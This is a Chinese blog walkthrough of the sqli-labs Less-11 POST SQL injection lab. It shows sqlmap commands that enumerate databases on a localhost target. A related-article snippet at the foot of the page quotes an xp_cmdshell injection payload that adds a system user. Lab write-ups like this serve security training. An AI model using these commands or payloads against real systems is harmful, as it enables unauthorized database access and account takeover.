sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)

最新推荐文章于 2023-03-23 19:34:13 发布
最新推荐文章于 2023-03-23 19:34:13 发布
阅读量345 收藏 3
点赞数
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023403/article/details/115609735
版权

sqli-labs less11 基于错误的POST型单引号字符型注入

一、知识储备

针对post型的表单,sqlmap有三种参数可验证:
–data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
–forms sqlmap中的自动抓包获取参数,最方便

二、验证漏洞

首先打开less11;
在这里插入图片描述
提交任意数据,用burp抓包;
在这里插入图片描述
记下post请求参数;uname=1111&passwd=11111&submit=Submit

这里介绍三种方法去检验该漏洞,满足一种证明该漏洞基本存在。

方法一:–data

找到需要提交的post参数,输入下面命令,–dbs枚举所有数据库名称;

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs

在这里插入图片描述

方法二:-r

将提交的报文抓包后,把信息存储在一个txt文件中,输入下面命令,–dbs枚举所有数据库名称;

python sqlmap.py -r 文件路径+文件名.txt  --dbs

在这里插入图片描述

方法三:–forms

利用该命令,使sqlmap自己抓包,输入下面命令,–dbs枚举所有数据库名称

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --forms --level=5 --dbs

在这里插入图片描述
在这里插入图片描述
这时证明该漏洞确实存在。

看我的眼色行事
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQL注入中绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
sqli-labs通关-------11lesson-post(基于错误POST单引号字符注入)
枯藤闲画云
07-05 432
Post 基于表单提交,类似于下图 Sql的注释:--【空格】单行注释 在url中用--+ # 单行注释 /**/ 多行注释 Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码 方法一: 我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。...
SQL注入】Less-11基于错误POST单引号字符注入
Mitchell_Donovan的博客
03-30 445
Less-11基于错误POST单引号字符注入 首先,这个是在用户登陆进行查询引发的postsql注入,和get差异很大;然后我们已知其中有个用户名dumb,密码dumb;进行登陆看看! 另外本实验将会用到extractvalue()该mysql报错函数进行sql注入;在登陆界面 输入dumb用户名 输入dumb密码 然后我们得到的拦截请求 提交post数据包uname=dumb&passwd=dumb&submit=Submit 不对它进行任何数据包修改,进行发送请求 这
sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误POST单引号字符注入)...
ajxi63204的博客
01-20 196
查看源码,用户名和密码通过post提交 加单引号提交 出现报错,推测对应的SQL语句 select ... from ... where xxx=''' and yyy='123' limit 0,1 直接使用or构造永真登录 成功,注意此处登录的用户为表中的第一个用户 需要改变用户可以通过改变筛选条件实现 作为表中的第二个用户登录 ...
sqli-labs-master第一关:基于错误的GET单引号字符注入
weixin_34402408的博客
11-12 419
首先来到第一关: http://127.0.0.1/sqli-labs-master/Less-1/ 用语句http://127.0.0.1/sqli-labs-master/Less-1/?id=1'进行测试报错 可以看到sql语句出错了。 用 and 1 = 1去测试: http://127.0.0.1/sqli-labs-maste...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
POST注入-显错注入 ——合天网安实验室学习笔记
weixin_42582241的博客
03-19 1267
实验链接 POST是HTTP/1.1协议中的一种资源请求方法。其向指定资源提交数据,请求服务器进行处理(例如提交表单或者上传文件)。本实验主要介绍了POST传送工具的使用,学会根据显错信息来设定注入语句。 链接:http://www.hetianlab.com/expc.do?ce=d2ed6f88-8aa7-489a-ac4a-371fa8b750ac 实验简介 实验所属系列: SQL注入初级 ...
sqli-labs靶场实现(三)【POST基于错误注入单引号、双引号)】(less-11~12、具体步骤+图文详解)
weixin_46709219的博客
12-15 725
一) 二) 三)
使用sqlmapsqli-less-11 的题解
weixin_44352058的博客
05-03 825
1.由于该题是post注入,所以我们用bp进行抓包并保存到与sqlmap相同的路径之下。 2.利用sqlmap查询注入sqlmap.py -r 123.txt。 3.查询数据库 sqlmap.py -r 123.txt –dbs 4.查看表 sqlmap.py -r 123.txt -D security –tables 5.查看列 sqlmap.py -r 123.t...
sqli-labs过程(1-11)
cc777777777的博客
03-23 261
sql注入sqlmap使用方法
sqlmap的使用 ---- 自带绕过脚本tamper
热门推荐
wkend的博客
09-15 4万+
sqlmap在默认的的情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改,还可以使用–tamper参数对数据做修改来绕过waf等设备。 0x01 命令如下 sqlmap -u [url] --tamper [模块名] sqlmap的绕过脚本在目录usr/share/golismero/tools/sqlmap/tamper下 目前sqlmap 1.2.9版本共有37...
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入单引号、双引号、括号闭合、字符、整
05-26 987
sqllabs靶场】sqlmap
Sqlmap命令详解
qq_45884195的博客
06-30 4839
sqlmap命令详解 目录0x01 sqlmap 确定目标1.1 直连数据库1.2 URL探测1.3 文件读取目标1.4 Google 批量扫描注入0x02 sqlmap 请求参数设置(一)2.1 设置 HTTP 方法2.2 设置 POST 提交参数2.3 设置参数分割符2.4 设置Cookie 头2.5 设置 User-Agent 头2.6 设置 Host 头2.7 设置 Referer 头2.8 设置 额外 HTTP 头2.9 设置 HTTP 协议认证2.10 设置 HTTP 代理0x03 sql
SqliLab_Mysql_Injection详解_字符注入(七)_POST注入_报错注入/布尔/时间盲注(14~17)
qq_41260930的博客
10-26 419
SqlLab_Mysql_Injection详解_字符注入(八) SQL注入_POST注入 原理 SqlLab关卡(包含14,15,16)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中) SqlLab-14(POST 注入): 初始界面 判断注入点(关键步骤) 由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的...
sqlmappost使用方法
sinat_41380394的博客
08-21 2774
http://120.24.86.145:8002/chengjidan/index.php 注入通过post提交id查询。 1.使用burpSuite拦截post包,复制下数据包为a.txt 2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有 例如 sqlmap -r a.txt -p username --batch --dum...
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值